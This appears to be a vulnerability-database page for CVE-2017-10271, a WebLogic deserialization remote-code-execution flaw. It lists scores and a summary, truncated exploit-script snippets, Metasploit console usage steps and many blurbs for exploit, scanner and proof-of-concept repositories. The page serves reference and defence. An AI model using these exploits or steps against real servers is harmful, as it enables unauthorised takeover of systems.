5
CVSSv2

CVE-2017-10271

Published: 19/10/2017 Updated: 03/10/2019
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9
VMScore: 526
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

Most Upvoted Vulmon Research Post

There is no Researcher post for this vulnerability
Would you like to share something about it? Sign up now to share your knowledge with the community.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

oracle weblogic server 10.3.6.0.0

oracle weblogic server 12.2.1.1.0

oracle weblogic server 12.1.3.0.0

oracle weblogic server 12.2.1.2.0

Exploits

## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient # include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( u ...
#!/usr/bin/env python # -*- coding: utf-8 -*- # Exploit Title: Weblogic wls-wsat Component Deserialization RCE # Date Authored: Jan 3, 2018 # Date Announced: 10/19/2017 # Exploit Author: Kevin Kirsche (d3c3pt10n) # Exploit Github: githubcom/kkirsche/CVE-2017-10271 # Exploit is based off of POC by Luffin from Github # github ...
import requests import sys url_in = sysargv[1] payload_url = url_in + "/wls-wsat/CoordinatorPortType" payload_header = {'content-type': 'text/xml'} def payload_command (command_in): html_escape_table = { "&": "&", '"': """, "'": "'", ">": ">", "<": "<", } command_f ...

Mailing Lists

The Oracle WebLogic WLS WSAT component is vulnerable to an XML deserialization remote code execution vulnerability Supported versions that are affected are 103600, 121300, 122110 and 122120 ...

Metasploit Modules

Oracle WebLogic wls-wsat Component Deserialization RCE

The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check and will not be used when executing the exploit itself.

msf > use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce
      msf exploit(oracle_weblogic_wsat_deserialization_rce) > show targets
            ...targets...
      msf exploit(oracle_weblogic_wsat_deserialization_rce) > set TARGET <target-id>
      msf exploit(oracle_weblogic_wsat_deserialization_rce) > show options
            ...show and set options...
      msf exploit(oracle_weblogic_wsat_deserialization_rce) > exploit
Oracle Weblogic Server Deserialization RCE - AsyncResponseService

An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a malicious SOAP request to the interface WLS AsyncResponseService to execute code on the vulnerable host.

msf > use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
msf exploit(weblogic_deserialize_asyncresponseservice) > show targets
    ...targets...
msf exploit(weblogic_deserialize_asyncresponseservice) > set TARGET < target-id >
msf exploit(weblogic_deserialize_asyncresponseservice) > show options
    ...show and set options...
msf exploit(weblogic_deserialize_asyncresponseservice) > exploit

Github Repositories

cve-2017-10271 POC

CVE-2017-10271 POC Introduction This is an autotest poc for CVE-2017-10271 Having been tested on CentOS 7 and Windows 7/10 Building This project is written in rust language You need to install rust environment from wwwrust-langorg/ first and then build the project with the following code $ cargo build --release Then you can get binary at target/release/cve-2017-10

CNVD-C-2019-48814 poc work on linux and windows

CNVD-C-2019-48814 work on linux and windows(CVE-2019-2725) WebLogic wls9-async反序列化远程命令执行漏漏洞 说明 It's does't work when weblogic patched for cve-2017-10271 10360 12130 基于jas502n的脚本修改而成 使用 python async_command_favicon_allpy 127001:7001 漏洞复现 1 Windows Server 2012 servers/AdminServer/tmp/_

cve-2017-10271

CVE-2017-10271 This is part of Cved: a tool to manage vulnerable docker containers Cved: gitlabcom/git-rep/cved Image source: githubcom/cved-sources/cve-2017-10271 Image author: githubcom/henryzzq/ubuntu_weblogic1036_domain/tree/master/ubuntu/weblogic1036_domain

javalearn JAVA反序列化学习 CVE-2017-10271 EXPLOIT TOOL在weblogic 1036测试通过,仅限学习交流使用,切勿用于非法用途。 SHA-1:34193b9c8e49d16e335c691b00fc3b319c99c2d2 MD5:88022abf8f18536bf9e62cdcb8b5163a

简介: Oracle WebLogic CVE-2017-10271漏洞批量检测工具(多线程) 安装: git clone githubcom/sch01ar/CVE-2017-10271git cd CVE-2017-10271 pip3 install -r requirementstxt 使用: python3 CVE-2017-10271py -i [url_file] -o [result_file] -t [threads] 警告: 请勿用于非法用途!!!

收集的比较有意思的exp

Exp_Collection Weblogic CVE-2017-10271 (有回显)

CVE-2017-10271 Weblogic 漏洞验证Poc及补丁

CVE-2017-10271 CVE-2017-10271 Weblogic 漏洞验证Poc Useage: python weblogicpy -u '****:7001/wls-wsat/CoordinatorPortType' -c 'touch /tmp/test'  点我下载补丁

look for weblogic wsat RCE from list

weblogic-wsat-scan look for weblogic wsat RCE from list based on githubcom/c0mmand3rOpSec/CVE-2017-10271/blob/master/scannersh ref: githubcom/c0mmand3rOpSec/CVE-2017-10271

WebLogic CNVD-C-2019_48814 CVE-2017-10271

WebLogic_CNVD_C_2019_48814 WebLogic CNVD-C-2019_48814 CVE-2017-10271 Scan By 7kbstorm

POC for CVE-2017-10271. Since java.lang.ProcessBuilder was the original vector for RCE, there are multiple signature based rules that block this particular payload. Added java.lang.Runtime and will add others in the future. This is for educational purposes only: I take no responsibility for how you use this code.

Weblogic_Wsat_RCE POC for CVE-2017-10271 Since javalangProcessBuilder was the original vector for RCE, there are multiple signature based rules that block this particular payload Added javalangRuntime and will add others in the future This is for educational purposes only: I take no responsibility for how you use this code

CVE-2019-2725poc汇总 更新绕过CVE-2017-10271补丁POC

CNVD-C-2019-48814和CNNVD-201904-961 感谢t00ls-ximcx0101提供脚本 CNVD-C-2019-48814 POC Summary 相关链接如下: 清水川崎大佬的简书: wwwjianshucom/p/c4982a845f55 安全祖师爷转发: dwzcn/2GQvbUae 由于环境的一些因素路径会存在变化: 默认上传路径为: servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war

CVE-2019-2725poc汇总 更新绕过CVE-2017-10271补丁POC

CNVD-C-2019-48814和CNNVD-201904-961 感谢t00ls-ximcx0101提供脚本 CNVD-C-2019-48814 POC Summary 相关链接如下: 清水川崎大佬的简书: wwwjianshucom/p/c4982a845f55 安全祖师爷转发: dwzcn/2GQvbUae 由于环境的一些因素路径会存在变化: 默认上传路径为: servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war

WebLogic Exploit

CVE-2017-10271 identification and exploitation Unauthenticated Weblogic RCE nvdnistgov/vuln/detail/CVE-2017-10271 wwworaclecom/technetwork/topics/security/cpuoct2017-3236626html POST /wls-wsat/CoordinatorPortType HTTP/11 Host: SOMEHOSTHERE Content-Length: 1226 content-type: text/xml Accept-Encoding: gzip, deflate, compress Accept: */* User-Agent: python-

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful …

CVE-2017-10271 Usage: python CVE-2017-10271py url

forked from https://github.com/s3xy/CVE-2017-10271. Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HT…

weblogic_wls_wsat_rce Weblogic wls-wsat组件反序列化漏洞(CVE-2017-10271)利用脚本,参考githubcom/s3xy/CVE-2017-10271修改。 命令执行并回显 直接上传shell 在linux下weblogic 10360测试OK 使用方法及参数 python weblogic_wls_wsat_exppy -t 1721680131:7001 usage: weblogic_wls_wsat_exppy [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHE

cve-2017-10271

weblogic_wls-wsat_component_deserialisation_rce_cve-2017-10271 poc&amp;exp exp only works while the path is exist can works for single or multiple ==just for learn==

CVE-2017-10271

CVE-2017-10271 CVE-2017-10271 命令执行并回显 直接上传shell 在linux下weblogic 10360测试OK 使用方法及参数 python weblogic_wls_wsat_exppy -t IP:7001 usage: weblogic_wls_wsat_exppy [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHELL] optional arguments: -h, --help show this help message and exit -t TARGET, --target TARGET

(CVE-2017-10271)Java反序列化漏洞

-CVE-2017-10271- (CVE-2017-10271)Java反序列化漏洞 Java反序列化漏洞利用工具V10 Java反序列化相关漏洞的检查工具,采用JDK 18版本开发,软件允许必须安装JDK 18或者以上版本。

CVE-2017-10271 POC

CVE-2017-10271 Weblogic wls-wsat组件反序列化漏洞(CVE-2017-10271)检测脚本 用法 $ python CVE-2017-10271 url 另外需要注册一个ceyeio的账号,将其提供的Identifier及API Token填入代码的如下部分: 功能 检测Windows及Linux环境下Weblogic是否存在CVE-2017-10271的远程命令执行漏洞 目前仅在Linux环境下测试过 Windows及L

WebLogic Honeypot is a low interaction honeypot to detect CVE-2017-10271 in the Oracle WebLogic Server component of Oracle Fusion Middleware. This is a Remote Code Execution vulnerability.

WebLogic honeypot Cymmetria Research, 2018 wwwcymmetriacom/ Written by: Omer Cohen (@omercnet) Special thanks: Imri Goldberg (@lorgandon), Itamar Sher, Nadav Lev Contact: research@cymmetriacom WebLogic Honeypot is a low interaction honeypot to detect CVE-2017-10271 in the Oracle WebLogic Server component of Oracle Fusion Middleware This is a Remote Code Execution v

Simplified PoC for Weblogic-CVE-2017-10271

PoCs-Weblogic_2017_10271 Simplified PoC for Weblogic-CVE-2017-10271

AD 2021 记录下我的2021年。(Inspired by yihong) 收藏的博客 序号 博客 备注 1 jimmysongio 云原生技术学习 2 githubcom/Maskhe/javasec Java 安全学习 收藏的文章 序号 标题 标签 备注 1 WAF攻防研究之四个层次Bypass WAF Web Security WAF 深度总结! 2 获取某个国家的全部 IP Tool - 3 BlackHat USA

weblogic-CVE-2019-2729-POC python3 POC for CVE-2019-2729 WebLogic Deserialization Vulnerability and CVE-2017-10271 amongst others

Oracle-WebLogic-CVE-2017-10271

WebLogic Wls-wsat XMLDecoder 漏洞描述 mitre:cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2017-3506 早期,黑客利用WebLogic WLS 组件漏洞对企业服务器发起大范围远程攻击,有大量企业的服务器被攻陷,且被攻击企业数量呈现明显上升趋势,需要引起高度重视。其中,CVE-2017-3506是一个利用Oracle WebLogic中WLS

CVE-2017-10271 Usage: CVE-2017-12149py targetip:port/ WEBLOGIC RCE Work with windows only, you could edit code a bit for linux

WebLogic Wls-wsat XMLDecoder 反序列化

WebLogic Wls-wsat XMLDecoder 漏洞描述 mitre:cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2017-3506 早期,黑客利用WebLogic WLS 组件漏洞对企业服务器发起大范围远程攻击,有大量企业的服务器被攻陷,且被攻击企业数量呈现明显上升趋势,需要引起高度重视。其中,CVE-2017-3506是一个利用Oracle WebLogic中WLS

Oracle WebLogic WLS-WSAT Remote Code Execution Exploit (CVE-2017-10271)

CVE-2017-10271 Weblogic wls-wsat Component Deserialization Vulnerability (CVE-2017-10271) Detection and Exploitation Script Usage $ python CVE-2017-10271py -l 10101010 -p 4444 -r willbepwnedcom:7001/ Features Standalone Python script Check functionality to see if any host is vulnerable Exploit functionality for Linux targets Metasploit module Check functionali

weblogic 漏洞扫描工具

weblogic-scan weblogic 漏洞扫描工具 妄想试图weblogic一把梭 目前检测的功能 console 页面探测 &amp; 弱口令扫描 uuid页面的SSRF CVE-2017-10271 wls-wsat页面的反序列化 CVE-2018-2628 反序列化 CNVD-C-2019-48814 后期可以的话还会继续加功能的,主要是一些反序列化的poc真的不好写,我也不咋会 USE 使用

Oracle WebLogic WLS-WSAT Remote Code Execution Exploit (CVE-2017-10271)

CVE-2017-10271 Weblogic wls-wsat Component Deserialization Vulnerability (CVE-2017-10271) Detection and Exploitation Script Usage $ python CVE-2017-10271py -l 10101010 -p 4444 -r willbepwnedcom:7001/ Features Standalone Python script Check functionality to see if any host is vulnerable Exploit functionality for Linux targets Metasploit module Check functionali

CVE-2017-10271 WEBLOGIC RCE (TESTED)

CVE-2017-10271 Usage: CVE-2017-12149py targetip:port/ WEBLOGIC RCE Work with windows only, you could edit code a bit for linux

Oracle WebLogic WLS-WSAT Remote Code Execution Exploit (CVE-2017-10271)

CVE-2017-10271 Weblogic wls-wsat Component Deserialization Vulnerability (CVE-2017-10271) Detection and Exploitation Script Usage $ python CVE-2017-10271py -l 10101010 -p 4444 -r willbepwnedcom:7001/ Features Standalone Python script Check functionality to see if any host is vulnerable Exploit functionality for Linux targets Metasploit module Check functionali

WebLogic wls9-async反序列化远程命令执行漏洞

CNVD-C-2019-48814 WebLogic wls9-async反序列化远程命令执行漏洞 回显poc for weblogic Patch update: wwworaclecom/technetwork/security-advisory/alert-cve-2019-2725-5466295html 漏洞复现: 101020166:7001/_async/AsyncResponseService curl -i 101020166:7001/_async/faviconico CNVD-C-2019-48814 Video python CNVD-C-2019-48814py -u

CVE-2017-10352 CVE-2017-10271 weblogic-XMLDecoder

本软件仅限用于学习交流禁止用于任何非法行为 #Weblogic-XMLDecoder-GUI CVE-2017-10352 基于python GUI 实验作品 主要功能针对对weblogic XMLDecoder 造成的反序列化漏洞的利用,开发目的熟悉python tkinter 类库以及ttk扩展的使用 稍后会封装为windows下可执行文件主要针对的漏洞为CVE-2017-10271 CVE-2017-10352,

Awesome Honeypots A curated list of awesome honeypots, plus related components and much more, divided into categories such as Web, services, and others, with a focus on free and open source projects There is no pre-established order of items in each category, the order is for contribution If you want to contribute, please read the guide Discover more awesome lists at sindre

Weblogic Upload Vuln(Need username password)-CVE-2019-2618

cve-2019-2618 Weblogic Upload Vuln(Need username password)-CVE-2019-2618 python使用 python CVE-2019-2618py url username password 解密weblogic密码 root@f0cb7e674d7e:~/Oracle# cat /root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/security/bootproperties |grep pass password={AES}dv/eNBsyg5GcDUbAKaQRheDZhzVk9yiTYVpXlGt9wEU= root@f0cb7e674d7

CustomSignatures I created or modified custom signature for McAfee NSP for me Please use them at your own risks My Threat Repo is below otxalienvaultcom/user/papa_anniekey/pulses UDS-HTTPJavaScript obfuscated with jjencode detectedzip githubcom/papa-anniekey/CustomSignatures/raw/master/UDS-HTTPJavaScript%20obfuscated%20with%20jjencode%20detectedzip Ori

Weblogic-XMLDecoder-POC Weblogic XMLDecoder系列漏洞POC 漏洞版本 CVE-2017-3506 CVE-2017-10271 CVE-2019-2725 CVE-2017-3506 项目中poc/2017-3506目录下存了两个poc: poc1xml : 执行命令,在/tmp目录下生成diggid文件,需要进docker里面验证 poc2xml : 反弹shell,需要外连 CVE-2017-10271 同3506 CVE-2019-2725 项目中poc/2019-2725目录

CyberSEC &amp; anti-SPY '╔═╗┌─┐┌─┐┬ ┬┬─┐┬┌┬┐┬ ┬ '╚═╗├┤ │ │ │├┬┘│ │ └┬┘ '╚═╝└─┘└─┘└─┘┴└─┴ ┴ ┴ Все о вопросах безопасности :: Windows 10 Hardening Script :: This is based mostly on my own personal research and testing My objecti

an awesome list of honeypot resources

Awesome Honeypots A curated list of awesome honeypots, plus related components and much more, divided into categories such as Web, services, and others, with a focus on free and open source projects There is no pre-established order of items in each category, the order is for contribution If you want to contribute, please read the guide Discover more awesome lists at sindre

WebLogic Insecure Deserialization - CVE-2019-2725 payload builder & exploit

CVE-2019-2725 WebLogic Universal Exploit - CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 payload builder &amp; exploit Info / Help $ python3 weblogic_exploitpy -h ======================================================================== | WebLogic Universal Exploit | | CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2

Awesome Honeypots A curated list of awesome honeypots, plus related components and much more, divided into categories such as Web, services, and others, with a focus on free and open source projects There is no pre-established order of items in each category, the order is for contribution If you want to contribute, please read the guide Discover more awesome lists at sindre

开源安全产品源码

项目介绍 搜集大量网络安全行业开源项目,这些开源项目,每一个都在致力于解决一些安全问题。 项目收集的思路: 一个是关注互联网企业/团队的安全开源项目,经企业内部实践,这些最佳实践值得借鉴。 一个是来自企业安全能力建设的需求,根据需求分类,如WAF、HIDS、Git监控等。

CyberSEC &amp; anti-SPY '╔═╗┌─┐┌─┐┬ ┬┬─┐┬┌┬┐┬ ┬ '╚═╗├┤ │ │ │├┬┘│ │ └┬┘ '╚═╝└─┘└─┘└─┘┴└─┴ ┴ ┴ Все о вопросах безопасности :: Windows 10 Hardening Script :: This is based mostly on my own personal research and testing My objecti

Awesome Honeypot Resource Collection. Including 250+ Honeypot tools, and 350+ posts about Honeypot.

所有收集类项目: 收集的所有开源工具: sec-tool-list: 超过18K, 包括Markdown和Json两种格式 全平台逆向资源: awesome-reverse-engineering: Windows平台安全: PE/DLL/DLL-Injection/Dll-Hijack/Dll-Load/UAC-Bypass/Sysmon/AppLocker/ETW/WSL/NET/Process-Injection/Code-Injection/DEP/Kernel/ Linux安全: ELF/ macOS/iXxx安全: Mach-O/越狱/LLDB/XCode

雷石安全实验室出品 V20 增加批量检测漏洞功能 去除登陆密码框 V10 weblogic administrator 控制台路径泄漏漏洞 弱口令 WebLogic, weblogic, Oracle@123, password, system, Administrator, admin CVE-2014-4210 Weblogic SSRF漏洞: 影响版本 : 1002,1036 127001:7001/uddiexplorer/SearchPublicRegistriesjsp CVE-2017-3506&amp;CVE-201

Awesome Honeypots A curated list of awesome honeypots, plus related components and much more, divided into categories such as Web, services, and others, with a focus on free and open source projects There is no pre-established order of items in each category, the order is for contribution If you want to contribute, please read the guide Discover more awesome lists at sindre

an awesome list of honeypot resources

Awesome Honeypots A curated list of awesome honeypots, plus related components and much more, divided into categories such as Web, services, and others, with a focus on free and open source projects There is no pre-established order of items in each category, the order is for contribution If you want to contribute, please read the guide Discover more awesome lists at sindre

Awesome Honeypots A curated list of awesome honeypots, plus related components and much more, divided into categories such as Web, services, and others, with a focus on free and open source projects There is no pre-established order of items in each category, the order is for contribution If you want to contribute, please read the guide Discover more awesome lists at sindre

CMS-Hunter 简介 Content Management System Vulnerability Hunter 说明:目前来看,本项目会进行长期维护,有修改的建议或者想法欢迎联系作者。 CMS 漏洞列表 Discuz Discuz_<34_birthprovince_前台任意文件删除 DedeCMS DedeCMS_v57_shops_delivery_存储型XSS DedeCMS_v57_carbuyaction_存储型XSS DedeCMS_v57_友情链接CSRF_GetSh

记录在漏洞研究过程中编写的 POC/EXP

vuln_Exploit 记录在漏洞研究过程中编写的 POC/EXP (部分 POC/EXP 因为工作原因不能公开) Shiro rememberMe 生成 Shiro 550 Weblogic WebLogic &lt; 1036 反序列化漏洞(CVE-2017-10271) WebLogic 管理控制台未授权访问(CVE-2020-14882) WebLogic 管理控制台命令执行(CVE-2020-14883) phpMyAdmin phpMyAdmin Remote Code Exec

CMS漏洞测试用例集合

CMS-Hunter 简介 Content Management System Vulnerability Hunter 说明:目前来看,本项目会进行长期维护,有修改的建议或者想法欢迎联系作者。 CMS 漏洞列表 Discuz Discuz_<34_birthprovince_前台任意文件删除 DedeCMS DedeCMS_v57_shops_delivery_存储型XSS DedeCMS_v57_carbuyaction_存储型XSS DedeCMS_v57_友情链接CSRF_GetSh

Awesome Honeypots A curated list of awesome honeypots, plus related components and much more, divided into categories such as Web, services, and others, with a focus on free and open source projects There is no pre-established order of items in each category, the order is for contribution If you want to contribute, please read the guide Discover more awesome lists at sindre

N-MiddlewareScan 魔改,自写的一款中间件漏洞扫描脚本

N-MiddlewareScan 魔改,自写的一款中间件漏洞扫描脚本 最近在看web中间件的漏洞 看到一个三年前的脚本:githubcom/ywolf/F-MiddlewareScan 想着自己写一个中间件相关的,正是脚本好写,poc和exp难 github链接:githubcom/nihaohello/N-MiddlewareScan #plugins vuln poc exp 主要是下面模块: 1axis xss

CMS-Hunter 简介 Content Management System Vulnerability Hunter 说明:目前来看,本项目会进行长期维护,有修改的建议或者想法欢迎联系作者。 CMS 漏洞列表 Discuz Discuz_<34_birthprovince_前台任意文件删除 DedeCMS DedeCMS_v57_shops_delivery_存储型XSS DedeCMS_v57_carbuyaction_存储型XSS DedeCMS_v57_友情链接CSRF_GetSh

WeblogicScanLot系列,Weblogic漏洞批量检测工具,V2.2

项目停止维护,批量扫描功能合并至githubcom/rabbitmask/WeblogicScan 软件作者:Tide_RabbitMask 免责声明:Pia!(o ‵-′)ノ”(ノ﹏&lt;。) 本工具仅用于安全测试,请勿用于非法使用,要乖哦~ V22简介: 提供weblogic批量检测功能,收录几乎全部weblogic历史漏洞。 【没有遇到过weblogi

Automated Tools Pentest

ABOUT: Kn0ck is an automated scanner that can be used during a penetration testing to enumerate and scan for vulnerabilities KN0CK COMMUNITY FEATURES: Automatically collects basic recon Automatically launches Google hacking queries against a target domain Automatically enumerates open ports via NMap port scanning Automatically brute forces sub-domains, gathers DNS info an

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes For more information regarding

Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities.

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes For more information regarding

CMS-Hunter 简介 Content Management System Vulnerability Hunter 说明:目前来看,本项目会进行长期维护,有修改的建议或者想法欢迎联系作者。 CMS 漏洞列表 Discuz Discuz_<34_birthprovince_前台任意文件删除 DedeCMS DedeCMS_v57_shops_delivery_存储型XSS DedeCMS_v57_carbuyaction_存储型XSS DedeCMS_v57_友情链接CSRF_GetSh

poc-exp 记录在漏洞研究过程中编写的 POC/EXP (部分因为工作原因不能公开) Shiro Shiro550 rememberMe 反序列化漏洞 (CVE-2016-4437) fastjson fastjson 1222-1224 TemplatesImpl 利用链 fastjson &lt;= 124 JdbcRowSetImpl 利用链 fastjson 1224-1268 gadgets Weblogic WebLogic &lt; 1036 反序列化漏洞(CVE-2017-10271) WebLo

Payloads_All_The_Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability d

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability d

vuln_Exploit 记录在漏洞研究过程中编写的 POC/EXP (部分 POC/EXP 因为工作原因不能公开) Shiro Shiro550 rememberMe 反序列化漏洞 (CVE-2016-4437) fastjson fastjson 122-124 TemplatesImpl 利用链 fastjson &lt;= 124 JdbcRowSetImpl 利用链 待完成:预计用 Java 写一个 fastjson 的利用工具 Weblogic WebLogic &lt; 1036

Code + documentation for the public GreyNoise API

GreyNoise Intelligence Alpha API Summary: GreyNoise is a system that collects and analyzes data on Internet-wide scanners GreyNoise collects data on benign scanners such as Shodanio, as well as malicious actors like SSH and telnet worms The data is collected by a network of sensors deployed around the Internet in various datacenters, cloud providers, and regions URL: https:

weblogic漏洞测试脚本

weblogic_httppy--CVE-2014-4210,CVE-2017-3506,CVE-2017-10271,CVE-2019-2725 weblogic_t3py--CVE-2016-0638,CVE-2016-3510,CVE-2017-3248,CVE-2018-2628,CVE-2018-2893

WeblogicScanLot系列,Weblogic漏洞批量检测工具,V2.2

项目停止维护,批量扫描功能合并至githubcom/rabbitmask/WeblogicScan 软件作者:Tide_RabbitMask 免责声明:Pia!(o ‵-′)ノ”(ノ﹏&lt;。) 本工具仅用于安全测试,请勿用于非法使用,要乖哦~ V22简介: 提供weblogic批量检测功能,收录几乎全部weblogic历史漏洞。 【没有遇到过weblogi

PayloadsAllTheThings_bak

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I pull requests :) You can also contribute with a IRL Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability description and how to exploit it Intrud

AD-Pentesting-Tools Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vul

增强版WeblogicScan、检测结果更精确、插件化、添加CVE-2019-2618,CVE-2019-2729检测,Python3支持

WeblogicScan 增强版WeblogicScan 从rabbitmask大佬的WeblogicScan V12 版本修改而来。 修改前源项目地址:githubcom/rabbitmask/WeblogicScan DEFF 支持Python3 修复漏洞检测误报,漏洞检测结果更精确 添加CVE-2019-2729, CVE-2019-2618漏洞检测 插件化漏洞扫描组件 添加彩色打印 INSTALL pip3 install -r requirementstxt

Weblogic一键漏洞检测工具,V1.5,更新时间:20200730

WeblogicScan Weblogic一键漏洞检测工具,V15 软件作者:Tide_RabbitMask 免责声明:Pia!(o ‵-′)ノ”(ノ﹏&lt;。) 本工具仅用于安全测试,请勿用于非法使用,要乖哦~ V 15功能介绍: 提供一键poc检测,收录几乎全部weblogic历史漏洞。 详情如下: #控制台路径泄露 Console #SSR

Weblogic一键漏洞检测工具,V1.5,更新时间:20200730

WeblogicScan Weblogic一键漏洞检测工具,V15 软件作者:Tide_RabbitMask 免责声明:Pia!(o ‵-′)ノ”(ノ﹏&lt;。) 本工具仅用于安全测试,请勿用于非法使用,要乖哦~ V 15功能介绍: 提供一键poc检测,收录几乎全部weblogic历史漏洞。 详情如下: #控制台路径泄露 Console #SSR

Weblogic批量漏洞检测工具 | 基于自己的需求对原版做了个修改

WeblogicScan Weblogic一键批量漏洞检测工具,V10 软件作者:Bywalks 免责声明:Pia!(o ‵-′)ノ”(ノ﹏&lt;。) 本工具仅用于安全测试,请勿用于非法用途,否则造成的一切后果自负~ 本版本为基于rabbitmask的WeblogicScan工具修改而成 基于我的需求做了部分优化 V 10使用方法: 需检

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability d

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Exploit Development Table of Contents General Stuff/Techniques Acquiring Old/Vulnerable Software Practice Exploit Dev/Structured Learning Exploit Dev Papers bof ROP BlindROP SignalROP JumpROP Heap Format String Integer Overflows Null Ptr Dereference JIT-Spray ASLR Kernel Exploitation Use After Free Other writing shellcode Windows Specific Linux specific Tutorials AV B

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains: READMEmd - vulnerability description and how to exploit it Intruders - a set of files to give to Burp Intrude

A list of useful payloads and bypass for Web Application Security and Pentest/CTF

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability d

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I pull requests :) You can also contribute with a IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability description an

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains: READMEmd - vulnerability description and how to exploit it Intruders - a set of files to give to Burp Intrude

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I pull requests :) You can also contribute with a IRL Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability description and how to exploit it Intrud

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I pull requests :) You can also contribute with a IRL Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability description and how to exploit it Intrud

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I pull requests :) You can also contribute with a IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability description an

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability descriptio

